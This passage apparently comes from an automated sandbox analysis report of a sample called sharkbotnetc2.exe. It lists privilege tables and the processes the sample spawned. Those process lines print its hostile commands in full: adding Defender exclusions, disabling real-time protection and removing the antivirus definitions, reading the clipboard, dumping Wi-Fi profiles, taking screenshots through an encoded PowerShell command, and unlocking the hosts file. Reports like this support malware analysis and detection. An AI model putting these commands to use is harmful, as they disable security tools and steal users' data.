| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://sharksecurity.vercel.app/shark_botnet_c2.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcf3146f8,0x7ffdcf314708,0x7ffdcf314718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11217340747550961604,9597045125740171900,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\desktop.ini
C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe"
C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_villburs-xray-pack.zip\sharkbotnetc2.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
